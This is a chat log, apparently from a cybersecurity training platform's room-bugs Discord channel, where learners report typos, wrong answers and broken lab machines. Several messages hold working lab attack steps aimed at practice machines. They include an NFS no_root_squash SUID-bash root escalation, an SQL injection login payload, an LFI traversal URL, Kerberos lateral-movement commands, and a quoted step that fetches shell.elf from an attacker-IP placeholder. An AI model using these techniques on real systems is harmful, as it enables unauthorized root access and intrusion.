#room-bugs

On completion of Introductory Networking room, there are 2 of the same next room links:
(minor things)

where can I report it more formally so it gets noticed?

Lo, just done the Intro to X86 Assembly room

And I noticed something odd going on here

Room's assembly simulator, the Lea instructions task

I can't exactlly seem to post any screenshots for some reason

but somebody's converted Endianness wrong on step 7. of the instructions,

mov [ebx+ecx], eax

where

EAX = 0x00000050

and the memory location is 0x4B

for some reason, the value in 0x4B after that instruction is 0x50000000

so it's no longer in Little Endian

that ain't right, right?

https://tryhackme.com/room/x86assemblycrashcourse

Task 8 Practice Time, Question:
Run the test and the cmp instructions. Which flags are triggered after the 11th instruction?
(Note: Use these abbreviations in alphabetical order with no spaces: CF,PF,SF,ZF)

The answer should be PF,ZF as that's what the Assembly Emulator shows. What's marked as correct is CF,SF which is the register status after the 10th instruction, not the 11th.

Did someone change before to after in the question? ;D

here's what I'm getting (screenshot) and here's the link:
https://nvd.nist.gov/vuln/search/results?form_type=Advanced&results_type=overview&search_type=all&isCpeNameSearch=false&pub_start_date=07%2F01%2F2021&pub_end_date=07%2F31%2F2021

Hi all,
How can i clone a room like https://tryhackme.com/room/introdigitalforensics
I already read the manual but there is no button for cloning a THM room. I can only clone rooms that I have created

You can't clone a room you didn't create.

In this guide https://help.tryhackme.com/en/articles/6498333-cloning-a-room it says that you can.
Anyway thanks for your response

I think that refers to business or education users

@stiff tundra can maybe confirm?

I hold an educational licence

Are you an admin?

The university just gave me the licence (paid for it - no idea)

It says that "the duration of your subscription belongs to and is regulated by...."

Is anyone else having issues with "Active Directory Basics" regarding the Active Machine Information every and any time I go to the IP address given through my own VM connected through THM I get the "The connection has timed out". I've tried restarting a new machine restarting my VM, getting a new OpenVPN configuration File and still no luck. Any assistance is appreciated.

i had same thing happen to me last night on the machine... i restarted things and worked for me... didnt know what else to do

Active Directory Basics, Task 6, Typo (under the impression I post some thing like this here) "While explaining every single ___ of them...."

came across typos in the past so just letting whomever know. not really a bug but just trying to help keep things looking good! ❤️

yeah just fine to report typos here

i did in past but i think i actually did it through the chat on website i cant remember 😄 thanks @rugged canyon !

Gave +1 Rep to @rugged canyon

both should work

hey hey folks. I believe ive identified a box that is not responding correctly with THM provided steps.

The room is https://tryhackme.com/room/exploitingad . It is not acting appropriately when following the written instructions. I was able to get the TGT for svcIIS and then able to get TGS for HTTP/WSMAN for t1_trevor.jones but it still wont let me enter a PSSession. I have tried other T1 admins as well and keep getting this same error. what is happening with this room that is preventing me from entering this pssesssion?

PS C:\Users\t2_caroline.dawson\wtf> Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc
Enter-PSSession : Connecting to remote server thmserver1.za.tryhackme.loc failed with the following error message : A specified logon session does not exist. It may already
have been terminated. For more information, see the about_Remote_Troubleshooting Help topic.
At line:1 char:1

• Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc

•   + CategoryInfo          : InvalidArgument: (thmserver1.za.tryhackme.loc:String) [Enter-PSSession], PSRemotingTransportException
    + FullyQualifiedErrorId : CreateRemoteRunspaceFailed

PS C:\Users\t2_caroline.dawson\wtf> klist

Current LogonId is 0:0x124df1

Cached Tickets: (2)

#0> Client: t1_trevor.jones @ ZA.TRYHACKME.LOC
Server: WSMAN/THMSERVER1.za.tryhackme.loc @ ZA.TRYHACKME.LOC
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 12/7/2023 17:13:45 (local)
End Time: 12/8/2023 3:13:18 (local)
Renew Time: 12/14/2023 17:13:18 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

#1> Client: t1_trevor.jones @ ZA.TRYHACKME.LOC
Server: HTTP/THMSERVER1.za.tryhackme.loc @ ZA.TRYHACKME.LOC
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 12/7/2023 17:13:39 (local)
End Time: 12/8/2023 3:13:18 (local)
Renew Time: 12/14/2023 17:13:18 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

PS C:\Users\t2_caroline.dawson\wtf> New-PSSession -ComputerName thmserver1.za.tryhackme.loc -Authentication kerberos

Id Name ComputerName ComputerType State ConfigurationName Availability

2 WinRM2 thmserver1.z... RemoteMachine Opened Microsoft.PowerShell Available

PS C:\Users\t2_caroline.dawson\wtf> Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc
[thmserver1.za.tryhackme.loc]: PS C:\Users\t1_trevor.jones\Documents>

Instructions are not clear and DO NOT SPECIFIC "-Authentication kerberos" in the command option to get this to completge

when I was doing the room, my notes state I used this command to initiate the remote powrshell connection and not "Enter-PSSession"

winrs -r:thmserver1.za.tryhackme.loc cmd

you can also use the follwing command to see what tickets are loaded into memory:

klist

Here are the 3 commands in order that I did:

klist
New-PSSession -ComputerName thmserver1.za.tryhackme.loc
winrs -r:thmserver1.za.tryhackme.loc cmd

Protocols and servers 2
5.2 the book.txt size is 416, but answer is 415

Thank you for the assistance! I will try your way to see if that also works for me. I was able to get the issue solved by adding -Authentication kerberos to my New-PSSession -ComputerName THMSERVER1.za.tryhackme.loc -Authentication kerberos

Gave +1 Rep to @devout bolt

I believe there is a bug in Wreath Network, Im at webserver exploitation [Task 6] where I have root access to the server and Im supposed to copy the id_rsa, but the file is empty

I would like to bump this issue because I ran into this issue as well.

Also, in the Lea Instruction in the above exercise, value of EAX is 0x00000050 at the time of the instruction 7. mov [ebx+ecx], eax the but when it executes it loads 0x50000000 into memory. Shouldn't it be 0x00000050?

Hello! I have been going through https://tryhackme.com/room/cryptographyintro and I think I found an important mistake. After discussing symmetric ciphers, the text says:

Integrity: When Bob receives an encrypted message and decrypts it successfully using the key he agreed upon with Alice, Bob can be sure that no one could tamper with the message across the channel. When using secure modern encryption algorithms, any minor modification to the ciphertext would prevent successful decryption or would lead to gibberish as plaintext.

That's misleading at best, if not just wrong. Unless a cipher with authenticated encryption is used (e.g. AES with GCM block chaining mode), an encrypted message can be modified without the recipient knowing it. That's why Message Authentication Codes are used. For example, AES-CBC wouldn't guarantee integrity. Since a beginner developer could think that encrypting something using a standard algorithm would be enough, I believe it would be a good idea to clearly state that a symmetric cipher on its own may not guarantee integrity.

👋
Typo in AoC-2023's Day 9 text:

THEN text = combine with space(["net", "localgroup", "administrators"]) // text = "net localgroup administrators
I think it was meant to be (something like) - depending on how C# does array slices:
THEN text = combine with space(array[1:]) // text = "net localgroup administrators"

Helloooo, I'm in the Wazuh room on Task 10 about using the API. It gives some very specific commands where I've added the username/password given in task 2 in an attempt to authenticate so I can use the API. The authentication command given in the room and from Wazuh's help center are the same but it does not work....I'm guessing the the username/password need to be a local linux user acccount and not a wazuh portal/gui user?

https://tryhackme.com/room/wazuhct

note: i've also tried the initial token command without a username and password as displayed in the room instructions but changed to the correct management IP
note2: This didn't prevent me from completing the room.

What does your token look like?

I had to fire the machine back up but this is the output for the token with and without the username/password combo provided:

Are you sure your token wasn't also Unauthorized when last you tried (with the correct user:pass)

In the screenshot when I first grabbed the token I didn't use the username/password provided...but I did again with the username/pass provided....and it still gave me the same output. I think the issue is that the web portal user isn't a valid user to do API calls....then again, i'm just guessing. I dont actually know why its not accepting the user provided.

https://tryhackme.com/room/splunkexploringspl
Tasks 4.1 and 4.2 contain incorrect answers or the task is incorrectly prepared

in room subdomainenumeration Task 3

Google give still 2 results. Non of them starting with a B

#room-bugs message

if you do following querry it shows more results: site:tryhackme.com site:*.tryhackme.com

I'm having an issue with the Linux Privilege escalation room on task 7. When looking for files/program's with the S bit set, this particular task is looking for nano with S bit set. In my second screenshot you'll see nano is installed but without the S bit set.

Each task has its own particular VM and this one is for SUID's.

command used:
find / -type f -perm -04000 -ls 2>/dev/null
https://tryhackme.com/room/linprivesc

nano was just an example in the task to demonstrate the concept. To answer the questions you have to find another one on the target machine that can be abused to achive your goal 🙂

ooohhhhhhhhhhhhhhhhhh snap. Ty.

https://tryhackme.com/room/adventofcyber2023 Task 17 [Day 11]
The following sentence is duplicated:

You can continue the exploitation by asking for a TGT of the vulnerable user using the certificate generated in the previous command.

Also, F138C405BD9F3139994E220CE0212E7C should be DDD22F37A3037852AFGE70FAB93E0CC71

I think that is by purpose. After the first tasks which were a more like a walk-through, the following tasks requires more actual work to solve the questions.

It doesn't make sense. I expected these three hashes to match.

so you should also mark that the usernames don't match 😉

The username matches just fine. It's all Administrator in the example it gives the reader.

Hello again, hopefully this is a bug and not something i'm doing wrong again but in the Linux Privilege Eseclation room on Task 11 (NFS). I've mounted all 3 shares into different /tmp/mount folders and did a test to figure out which one I can write to....and the only folder I can write to is the /tmp folder share. No problem, I've created my mini bash program, set the S bit but when I run the program I get an error

./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)

Looks like a dependency is missing, lib6

I checked a walkthrough video and guide on medium and they're all using the same little program. Hopefully the screenshot isnt too confusing.
https://tryhackme.com/room/linprivesc

How did you compile the exploit?

gcc nfs.c -o nfs -w

Can you try to compile it again and add -static in the command and try running it again?

ok

1 min, the machine is booting

just to be clear the command is:

gcc nfs.c -o nfs -w -static

That totally worked - what does the -static flag do?

oh wait a sec, i'm not the root user....I could run the script but do not have the priv's

oh yes this problem

it is very common

the task text is an example and not the easiest way to get the correct answer

Usually, apps or programs have dependencies or requirements for it to run. Adding that flag makes it a static binary thus running without dependencies.

i.e do this:
on target machine:

cp /bin/bash /path/to/nfs/share/folder

on attack machine:

sudo chown root:root /path/to/mounted/nfs/share/bash
sudo chmod +sx /path/to/mounted/nfs/share/bash

on target machine:

/path/to/nfs/share/folder/bash -p
id

tada it now shows that you got an effective user id of root
is the entire list of things you need to do to use the bash approach and it will work on every target machine that has bash and nfs with no_root_squash

TADA you did it

When you compiled the binary, did you do so with sudo privileges?

living of the land is often better then cross compilation or trying to do static compiling shadow finds

Will add it in my notes.

i.e what shadow is doing above is copying the targets bash binary... chaning its permissions and setting suid bit.... then you can run it with -p to keep effective user and group... and tada you got an effectively root shell

@devout bolt ⬆️ see the message shadow posted above that this is a reply to... this will work with basically any nfs share that has the no_root_squash setting set

This is great!! Thank you so much! Same results with a different method, I'm very greatful to see another way to get the same result...I hadnt even though of copying bash to the shared folder...genius!

Gave +1 Rep to @rugged canyon

Oh and yes, it totally worked and has given me insight on another way to solve this type of problem

https://tryhackme.com/room/adventofcyber2023 Task 18 [Day 12]
The commands rm config.xml and cp config.xml.bak config.xml should have sudo prepended.

@wheat fractal

@wheat fractal

Hey, are you a robot? 🤖

Hello i have found a typo in room https://tryhackme.com/room/nmap04 task 4 question 2

You'll be better posting it, as from this alone, nobody will be sure which word?

cant post a screenshot

Can you figure out the name for the script that checks for the remote code execution vulnerability MS15-034 (CVE2015-2015-1635)? => CVE2015-1635

not sure if this counts as a bug but in agent-sudo the answer form will accept your entry for the password even if it's not quite right... Tripped me up and a few others I saw asking about the same. if there's a way to tighten the answer tolerance on the password it would avoid confusion.

@covert field just refresh the page and it should fix this error

https://tryhackme.com/room/adventofcyber2023 Task 19 [Day 13]
There's a typo in "we can attempt to connect to the VM by navigating to on the AttackBox browser". For example, I think it should read "we can attempt to connect to the VM by navigating to it on the AttackBox browser".

Bro don’t worry about such little things

i cant send message in the koth

is there anyone know how to fix this bug

?

You need to verify your tryhackme account

thanks got it

Hi Hackers,

I am trying to solve the Lesson Learned? Room. I tried everything by myself first then I felt I was stuck at rabbit holes. So checked the walkthrough over the Internet about this room and then I tried SQLi there but the web page is not responding as it is supposed to be. Could anyone guide me what is the issue with this page?

My payload:
Username: 1' UNION SELECT null-- -
Password: pass

The response back from the server is an invalid password.

I would appreciate your response.

You might need to change your username.

Hello! For the advent of cyber challenge Day 11 challenge I am getting this error when trying to run the script:

"PS C:\Users\hr\Desktop> . .\PowerView.ps1
. : File C:\Users\hr\Desktop\PowerView.ps1 cannot be loaded because running scripts is disabled on this system. For
more information, see about_Execution_Policies at https:/go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:3

• . .\PowerView.ps1

• + CategoryInfo          : SecurityError: (:) [], PSSecurityException
  + FullyQualifiedErrorId : UnauthorizedAccess"
  
  

I do not appear to have admin access to allow this. Am I doing something wrong?

sorry guys

apparently i cannot read

disregard 🙂

Hola Rickymoney99, you can found on the web site of microsoft learn for the powershell execution policy bypass. “https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4”

Or if you are running a ps1 file for powershell, firstly you need to bypass for powershell the execution policy and then the ps1 file you can running with the escalated permissions.

tryhackme doesn't care about fixing typos?

They do.

https://tryhackme.com/room/adventofcyber2023 Task 20 [Day 14]
"X_train contains the training data, and X_validate our validation data. y_train contains the labels for our training data, and y_validate our labels for validation data."
should be
"train_X contains the training data, and validate_X our validation data. train_y contains the labels for our training data, and validate_y our labels for validation data."

Room: Tactical Detection (https://tryhackme.com/room/tacticaldetection)
Task 3 - Last Question:

Question:
What is the source, as shown in the output?

Problem:

• I think this has been updated since the room was created. See screenshot of the current source information.
• The "correct" answer as of now is WinEventLog:*
• This should be changed to WinEventLog:Security

AOC2023 day 14 Putting it all together --- or not.. Not so serious but inconsistency in the text vs. the filenames in the folder: dataset_train.csv >> training_dataset.csv and dataest_test.csv = testing_dataset.csv

I'm not sure if this is the right channel, but there is an issue within the Holo network. In Task 22 you're guided towards colabcat to crack a hash. https://github.com/someshkar/colabcat
The Problem with Colabcat is that it can get your Google account banned from any further Google Colab usage. It would be nice to add a warning, or change the task completely.

I agree with this. For any THM staff who see this, I would recommend providing a section on this tool. It's an open-source password cracker that utilizes AWS without breaking rules. We use it for actual pentests where I work.
https://github.com/Coalfire-Research/npk

Hi there, There is one typo in the Jupyter notebook for the Day-15 of the Advent Of Cyber'23. Don't know if it is intentional or not so can someone from staff or mod reach out to me then we can confirm it? It is very minor but something that can create trouble for beginners.

@quaint sparrow did you get the bug/typo?

Scrubz is a volunteer and not a member of THM Staff so he won't be able to make any changes to any rooms.

ok thx. what then is to do?

Just wait. 🙂

It's not room breaking.

🫡

Should be fixed, thx. 👍

thank you 🙂

Gave +1 Rep to @raw bison

Great find... I've been working on this task for 3 days

Should be fixed, thanks for reporting 🙂

Gave +1 Rep to @gloomy berry

.

Hallo! I guess there should be a small typo in today's AOC room

there's this command at more or less 70% of the task:
rwfilter FILENAME --fields=sIP,dIP --values=records,bytes,packets --count=10

But then in the cli rwstats is typed.

[day 17]
There is an output example:

              sIP|            dIP|                    sTime|
  175.175.173.221| 175.219.238.243|              [REDACTED]|
  175.175.173.221| 175.219.238.243| 2023/12/08T04:28:45.678|
  175.175.173.221| 175.219.238.243| 2023/12/08T04:28:45.833|
  175.175.173.221| 175.219.238.243| 2023/12/08T04:28:46.743|
  175.175.173.221| 175.219.238.243| 2023/12/08T04:28:46.898|
  175.175.173.221| 175.219.238.243| 2023/12/08T04:28:47.753|
  175.175.173.221| 175.219.238.243| 2023/12/08T04:28:47.903|
  175.175.173.221| 175.219.238.243| 2023/12/08T04:28:48.764|
  175.175.173.221| 175.219.238.243| 2023/12/08T04:28:48.967|

and it says:

Red flag! Over 10 DNS requests in less than a second are anomalous. We should highlight this communication pair in our report.

This is not correct - there are at most two requests per second. I guess, this could be "over 10 requests per minute" ..or the sample itself is wrong

2023/12/08T04:28:45.833
^    ^  ^  ^  ^  ^  ^
y    m  d  h  M  s

.

Hello
Currently the day 16 of AOC machine not working.
If something can be done thanks 😉

Something was done. Reboot the machine

👋 I'm sorry if this is the wrong place for this, but I'm catching up with Advent of Cyber and for some reason I can't submit the flag on Day 16. I click the button but nothing happens. I've been able to submit all the other answers without issue.

I've tried multiple browsers but no luck.

this problem is still present, can someone fix it?

inputting an answer from a walkthrough, I was able to get the correct answer...

#soc-level-2-path message ditto to the above

AOC Day 14: http://websiteforpredictions.thm:8000/ is not working.

you can only access that on the target machine said task starts for you

So I cannot use my linux vm?

Did your try again it with the a different browser?

It won't work with a different browser.

No, as it the website points to the local host.

What is it means?

Heya again - having a strange issue with the Lateral Movement room/network. DNS doesn't seem to be working over the VPN connection. I tried multiple times to restart the NetworkManager service, have only 1 DNS server and manually set /etc/resolv.conf but it seems my requests aren't going through. I booted up the attack box and it works just fine. I'll use the AB for now.
https://tryhackme.com/room/lateralmovementandpivoting

oof i take it back, even the attack box is having trouble....I did vote for a room reset, need 3 more:

i have same issue but is with exploitad room

Just reporting that the following two rooms have very much the same content and are both within the learning pathways for web fundamentals.

https://tryhackme.com/room/burpsuitebasics

https://tryhackme.com/room/burpsuitebasicsold

The former is the refreshed module. The content may essentially be the same, but the former has been aligned to the current burp suite version.

Volatility requires python version 2.6, please upgrade your python installation.

What year is it 😆

(not a bug, just for fun )

@glad badger @hazy tiger ⬆️

Done!

Heya All - weird issue with the Lateral movement room task 6 - we're given T2 credentials with an internal site (like many of the other tasks). I've tried 4 sets of credentials and each time I get an Incorrect Password error when trying to connect via RDP. If anyone could lend a click to reset the room that would be great - hopefully its not a true bug but someone just got in as a domain admin and changed passwords on us (lulz)
https://tryhackme.com/room/lateralmovementandpivoting

oh man I hate to be the squeaky wheel but now there's an even worse problem LOL. I let the room timer lapse so it would auto shutdown/reboot or w/e behavior is done after the room timer expires. After the machines were shutdown (ping test) i started the room back up. Now THMDC is completely unreachable via ping and not responding to DNS requests. I can ping THMJMP2 via IP but since THMDC isn't responding pinging by its FQDN is also not functioning (as expected)

oh yay, things are back to working after a room reset- disregard! 😄

In https://tryhackme.com/room/linuxmodules
Task: du
the command that alternates ls is du -a --time -d 1 . adding the -a flag to du --time -d 1 . in the original text

.

@oblique panther Automoderator will mute you if you continue

Okey, silence me.

The burpsuiteold is the one which is in the learning path for the Complete Beginner Path. If it's been replaced with the newer version to match what's on the attack box, then I would replace it here too. I was actually just coming here to report that Task 11 - The Burp Suite Browser has the wrong information about the location of the setting to turn off the sandbox, and that may already be corrected in the other module.

.

-mute 24h 951764006924849212 keeps on posting “.” In channels, was warned

Mute <User:Mention/ID> <Duration:Duration> <Reason:Text>
Mute <User:Mention/ID> <Reason:Text> <Duration:Duration>
Mute <User:Mention/ID> <Duration:Duration>
Mute <User:Mention/ID> <Reason:Text>
Mute <User:Mention/ID>

Invalid arguments provided: No matching combo found

:mute: r00tt#0 has been muted.

Good evening

"I am reading a course on Windows APIs, and I have this question that is blocking me."

Which character appended to an API call represents an ANSI encoding?

The answer is in the material.

Check the rules plz.

#rules
Number 8.

Room URL: https://tryhackme.com/room/uploadvulns#
Summary: I’ve worked with #room-help already. According to those who assisted me, my enumeration should be working. I’ve opened a new VM and attack box 5 times now including the most recent which this documentation is build on. Is there any way to verify this room is still working. The general consensus from Discord is that I have done everything correctly

Additional Notes:

Discord conversation in #room-help begins at:

https://discordapp.com/channels/521382216299839518/522158539129618453/1189345468048736367

Below is the exact commands and output captures. I booted a whole new VM and Attack box when starting this documentation.

sudo nano /etc/hosts

10.10.31.214 overwrite.uploadvulns.thm shell.uploadvulns.thm java.uploadvulns.thm annex.uploadvulns.thm magic.uploadvulns.thm jewel.uploadvulns.thm demo.uploadvulns.thm

ctrl x
y
‘enter’

cat /etc/hosts

127.0.0.1    localhost
127.0.1.1    tryhackme.lan    tryhackme

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters


10.10.31.214 overwrite.uploadvulns.thm shell.uploadvulns.thm java.uploadvulns.thm annex.uploadvulns.thm magic.uploadvulns.thm jewel.uploadvulns.thm demo.uploadvulns.thm

launch firefox, then refresh firefox

firefox - http://overwrite.uploadvulns.thm

webpage loads

gobuster dir -u http://overwrite.uploadvulns.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

The output is:

root@ip-10-10-211-54:~# gobuster dir -u http://overwrite.uploadvulns.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://overwrite.uploadvulns.thm
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2023/12/27 00:21:37 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/server-status (Status: 403)
===============================================================
2023/12/27 00:56:56 Finished
===============================================================

Good it does work

https://tryhackme.com/room/exploitingad have bug in the part of Exploiting GPOs , i have the user (including i have tested following a walktrough https://benheater.com/tryhackme-exploiting-active-directory/), but the user svcServMan with or without password let login trough runas command, dont care if i let it in blank or put asdasdknqodqw in password is let me spawn CMD Process, the problem is i follow the guide in the walktrough and in the instructions about add GPM in mmc.exe but say i dont have permission from the DC za.tryhackme.com , i have tested runas /netonly /user:za.tryhackme.loc\svcServMan cmd.exe and tested runas /netonly /user:THMSERVER2.za.tryhackme.loc\svcServMan cmd.exe and is same issue, i login in THMWRK1 server with T2 admin t2_caroline.dawson from his rdp using xfreerdp command, but still have the issue, i have tested reset the lab and some days ago too and i experimenting same issue

a note to add when i try to go to http://distributor.za.tryhackme.loc/creds when i add the next command on attackbox systemd-resolve --interface exploitad --set-dns 10.200.120.101 --set-domain za.tryhackme.loc it says to me the url distributor.za.tryhackme.loc/creds

Hmm. We\u2019re having trouble finding that site.

We can\u2019t connect to the server at distributor.za.tryhackme.loc.

If you entered the right address, you can:

    Try again later
    Check your network connection
    Check that Firefox has permission to access the web (you might be connected but behind a firewall)

seems to be problem from DNS in the room i guess because i have followed the steps and some times work and other times no

thanks

Gave +1 Rep to @rugged canyon

OWASP Top 10 has a dead link for WPScan on Task 13.
https://tryhackme.com/room/owasptop102021

hello #room-bugs
I guess there is a misunderstanding issue in the day 23 of the AoC Coerced Authentication room.
According to Microsoft
"A user accesses a client computer and provides a domain name, user name, and password" (the password provided is not sent to the server and is kept locally). 'The client computes a cryptographic hash of the password and discards the actual password"
https://learn.microsoft.com/en-us/windows/win32/secauthn/microsoft-ntlm
not as the room claims as shown in the picture, and it only should be sending a plain text username, requesting a challenge to solve to prove their identity.
So the password sent in stage-1 should be removed and only send a username.

You are referring to the Microsoft resource, but the application in day 23 isn't a MS one?

it is

#room-bugs on room metasploitexploitation task 6 question 3:
http://ATTACKING_MACHINE_IP:9000/shell.elf => http://ATTACKING_10.10.109.74:9000/shell.elf

What do you mean? The 'MACHINE IP' changes to the assigned IP after clicking on the green Start Machine button and letting it spin up after a few minutes.

thats correct but the text "...ATTACKING_10.10.109.74" is confusing. The placeholder is wrong. it has to be ATTACKING_IP and not ATTACKING_MACHINE_IP

Yes, me too.

Yes, it should be done.

Oh.. got it.

just doing the learning path and see some typos. maybe its important or not 🤷‍♂️

There were several instances I saw in the discord being corrected by THM Staff. Let's just wait for it as most are probably enjoying their holidays. Also, good job on doing the paths. Can't stick to following one myself. 😅

yes thats true.

well just start and do one by one 😉

Thanks to the AoC2003 sidequest i am a noob to wireshark. Thats the next path i have to choose

Gave +1 Rep to @unborn pulsar

Bot got confused with the rep.

#room-help message

Salut quick reminder for OhSINT room,
As mentioned in this earlier message, OhSint room can't be done w/o writeups as the WordPress site does not exists for some time. Only be accesible via wayback machine but in order to find it via wayback machine you need the URL and so URL only be found via writeups.

What do you mean? If its the Oliver Flint blog, I think it is part of the challenge for you || to search for the site and look it up using wayback machine. ||

Hello, I was working on the room "Snapped Phish-ing Line" and I think the answers to the question "when was the phishing domain that was used to host the phishing kit archive first registered?" has changed and the causing right answers to be returned as wrong

Actually, under normal conditions site was reachable via just searching (without wb.machine) the username of Oliver Flint at google 1st page(as I saw from writeups, they just search google and go to the wordpress site n so on)

Room

• https://tryhackme.com/room/threatinteltools
• Task 4 Abuse.ch

typo on the word Institute

Im doing the buffer overflow prep room and I'm on task 10 (Overflow9) and it appears that the correct answer for the second question isn't being accepted. I re-did everything 3 times, then I watched a walkthrough video and the person has the exact same results as me but the answer isnt being accepted? I was able to answer the first question correctly which is needed to answer the second one.

The believe answer should be: \x00\x04\x3e\xe1\ but its not accepting it. https://tryhackme.com/room/bufferoverflowprep

Answer task 11, no problem....so strange D:

Man those trailing backslashes will kill you.

wdym? D:

Look at the answer you pasted - there's a trailing backslash

Thats how all the others were answered....just tried to answer it witout the trailing backslash and it still doesn't like the answer 😦

oh i take it back, the other ones dont have that back slash (could have sworn they did) but still doesn't work....unfortunately

Just looked at my Task 11 - yep the answer is incorrect.

task 10 tho?

Sry, Task 10, there are XX badchars

haha all good - oh damn....uhm, let me revisit ^__^ ty

I only see 4....gosh, i dont know what i'm doing wrong 😦

nope not broken... the first task mentions that sometimes when 1 byte is a bad byte the byte next to it can also be a bad byte... in this instance both \x3e and \x3f are bad bytes... hence you are missing one

#site-bugs

Aurora EDR Room Bugs (https://tryhackme.com/room/auroraedr):

1. In order to get the system to generate logs properly, you have to manually set the timeframe to June of 2022 otherwise you just get a message that the licensed has expired.

2. Task 7, question 1 asks this question:

What is the title of the first event rule?``` 
It expects this answer (which is incorrect):
```WMI Process Reconnaissance``` 

The actual correct answer is this:
```Process Reconnaissance Via Wmic.EXE```
This comes directly from the .yml triggering the rule: https://github.com/SigmaHQ/sigma/blob/0.22-2839-gc0332a9d9/rules/windows/process_creation/proc_creation_win_wmic_recon_process.yml

3. Task 7, question 4:

What is the Rule Title of the second Event?```
There is no second event triggered. The only way to properly trigger the 2nd event is if you delete the "password.txt" of the first time you run the batch file (which will fail to create events since the license is expired). I figured this out by reading the help archive and reverse engineering the answers as I am able to clone rooms with my business account.

Overall, I strongly suggest Task 7 be re-written to include this information:

• Manually setting the time on the PC so it is within the license BEFORE running the batch file.
• Fixing the answer to Task 7 question 1.

In the cloned room below, I fixed both of these issues as a reference point for THM Staff to review:
https://tryhackme.com/jr/auroraedrCk

whoops nevermind

oh dang, I missed that little detail.....thanks :). Is there a way to identify the bad byte easily even though the debugger program didn't specifically tell me? Or is it just guessing?

well trying and failing to exploit it where it and rerunning the bad byte check when you have removed the previous bad bytes tend to tell you

gotcha - that makes sense

Yes

On The Room https://tryhackme.com/room/osimodelzi at Task 4 Layer 5 - Session may be that highlighted Whilst mean is While

If I'm not mistaken, this is accepted in British English so it is technically correct.

Oke ..

Whilst is being used as a conjunction which is perfectly valid in British english (which is the what I wrote the room in) 🙂

hi .. i am learning XSS and at https://tryhackme.com/room/xss room in Task-4 Stored XSS i accidentally input ||databaser|| it's run as a correct answer.

Answer tolerance; if your answer is 95% correct it will be accepted

Yes, like one tolerance.

Not a big deal, but there is a small grammatical error in task 3 of the "Intro to C2" room. Where it says this: [..] and signatures can be easily be developed.

How ?

There's two "Be"'s

Link the room, please?

https://tryhackme.com/room/introtoc2

Room : "Unattended" running like a dog. Registry explorer not opening at all please check

Hello!

Flag8 and 9 are not working in the room:

https://tryhackme.com/room/windowslocalpersistence

I managed to get the flag, I already consulted a whiteup, but I still can't add the flag.

Have you done the room in one go?

I've already tried twice.

I read that this room has to be completed from task 1 all throughout the end in one go, otherwise you won't be able to complete it.

The problem is not execution. I'm getting the flag, but even though the binary shows the flag and I correctly copy the THM it doesn't accept it.

Ooh.. that's a different issue then from the one I read.

Room: Ice -- Task 3
Problem -- The cvedetails website has changed its format. it no longer gives you the grid that can be seen in writeups.. I was trying to avoid using one to get the answer, because I thought it would be clear. Since the answer on Q1 is very specific to that website, its difficult to answer that question. The direct link to the CVE also no longer lists the Vulnerability Type (https://www.cvedetails.com/cve/CVE-2004-1561/). I am putting in the answer from the walkthough to get through it, but think the question should be changed and not use that older type naming. Tried finding Darkstar on the Discord list to PM, but see that they might not be active. (reposting as requested)

Room: Ice -- Task 3
Problem -- makes reference to a room as a potential prereq that is showing as private and I can't search for it. I think that means it's been retired? I have a sub so i don't think it's that.. Adjust if needed.. Link is to -- https://tryhackme.com/room/rpmetasploit

That RP: Metasploit reference is also made in Task 4 (Escalate) - in the questions, saying that the commands are taken from that room.

Hello @placid aspen, thanks for bringing it up, I have raised it to be looked into 🙂

Gave +1 Rep to @placid aspen (current: #457 - 9)

https://tryhackme.com/room/powershell Task 3 question 1 asks for the location of "interesting-file.txt", but the actual file is called "interesting-file.txt.txt". I was wondering why I couldn't find it...

Also, the backup file in Task 4 has a double extension: ".bak.txt". It looks like it wasn't intentional and makes it more difficult to find the file.

Is the USTOUN room fixed? the databse port dtill doesn't spawn for me

https://tryhackme.com/room/nahamstore
http://nahamstore.thm/product/picture/?file=....//....//....//....//....//....//lfi/flag.txt
According to writeup's the intended way is causing me errors

Typo In Task 2 of https://tryhackme.com/room/windowsapi

• Core DLLs: A group of four DLLs that define call structures. (KERNEL32, USER32, and ADVAPI32). These DLLs define kernel and user services that are not contained in a single subsystem.
  ...what's the fourth?

This room has been retired a couple of weeks ago.

#retired-rooms message

the room introtodockerk8pd has incomplete sections and a missing box

Which task?

running your first Container

Everthing is there for me?

it says update and change for me

Can you take a screenshot after verifying your account?

should i send the screenshot here?

Yeah.

Can I have the link to the room please? Lol

https://tryhackme.com/room/introtodockerk8pd

Oh!

You have the old room, Where did you get that from?

the newest room links to it

Ah, thanks for pointing out.

oooh

lol happens

cc @dusky junco

New rooms points to https://tryhackme.com/room/introtodockerk8pd instead of https://tryhackme.com/room/introtodockerk8pdqk

i thought i had that room completed lol

`Container Vulnerabilities" ?

yes

huh that's interesting

Oops. Thanks! I've updated the URL in task 1 🙂

Gave +1 Rep to @quaint sparrow (current: #2 - 1825)

Thanks to you! (get your rep)

Gave +1 Rep to @rocky heart (current: #1962 - 1)

+rep @rocky heart

Gave +1 Rep to @rocky heart (current: #1298 - 2)

